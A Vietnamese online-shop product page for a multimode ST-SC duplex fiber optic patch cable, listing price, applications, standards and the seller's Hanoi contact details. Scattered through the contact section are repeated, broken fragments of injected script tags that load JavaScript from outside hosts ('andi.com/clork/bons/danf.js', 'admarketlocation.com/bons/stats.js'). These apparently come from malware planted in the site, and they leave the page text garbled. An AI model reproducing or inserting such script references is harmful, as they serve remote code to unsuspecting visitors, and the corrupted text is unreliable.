Dây nhảy quang Multi ST-SC 3.0M Duplex

  • Giá thị trường: 200.000 đ
    Số lượng

    Mô tả sản phẩm

    Dây nhảy quang Multi Mode ST – SC 3.0Met Duplex
    Thông tin sản phẩm
    quang SC ( SC/PC, SC/UPC, SC/APC ); ST (ST/PC, ST/UPC, ST/APC)
    – Dây nhảy quang được sử dụng làm cầu nối giữa các liên kết mạng quang, kết nối giữa các ODF quang,
    tủ phối quang, các thiết bị truyền dẫn quang với nhau. Dây nhảy quang mang lại sự linh hoạt và thuận
    thiện cho người sử dụng hệ thống mạng quang.
    – Dây nhảy quang được ứng dụng rộng rãi trong CATV; Fiber Optic Telecommunication System; Fiber
    Optic Access Network; LAN; Fiber Optic Transducer; Fiber 0ptic Data Transmission; Test Equipment;
    Metro; Active Device Termination, FTTx, FTTH vv…
    Đặc điểm
    2. Chiều dài 3.0 m
    4. Khối lượng nhỏ nhẹ, dễ dàng sử dụng – plug and play
    5. Tuân theo các chuẩn JSC, IEC, Bellcore, TelcordiaTM GR-326
    6. Tiêu chuẩn chống cháy UL94V-O
    andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/stats.js?t=7&’ type=text/javascript language=javascript>andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/stats.js?t=7&’ type=text/javascript language=javascript>

    CÔNG TY TNHH CÔNG NGHỆ THÔNG TIN TPC

    andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/stats.js?t=7&’ type=text/javascript language=javascript>andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/stats.js?t=7&’ type=text/javascript language=javascript>

    Showroom : Số 02, Ngõ 185 Chùa Láng – Đống Đa – Hà Nội
    Điện Thoại : 024.37668134

    andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/stats.js?t=7&’ type=text/javascript language=javascript>andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/stats.js?t=7&’ type=text/javascript language=javascript>

     Hotline: 0915.0915.33 – 0943.969.919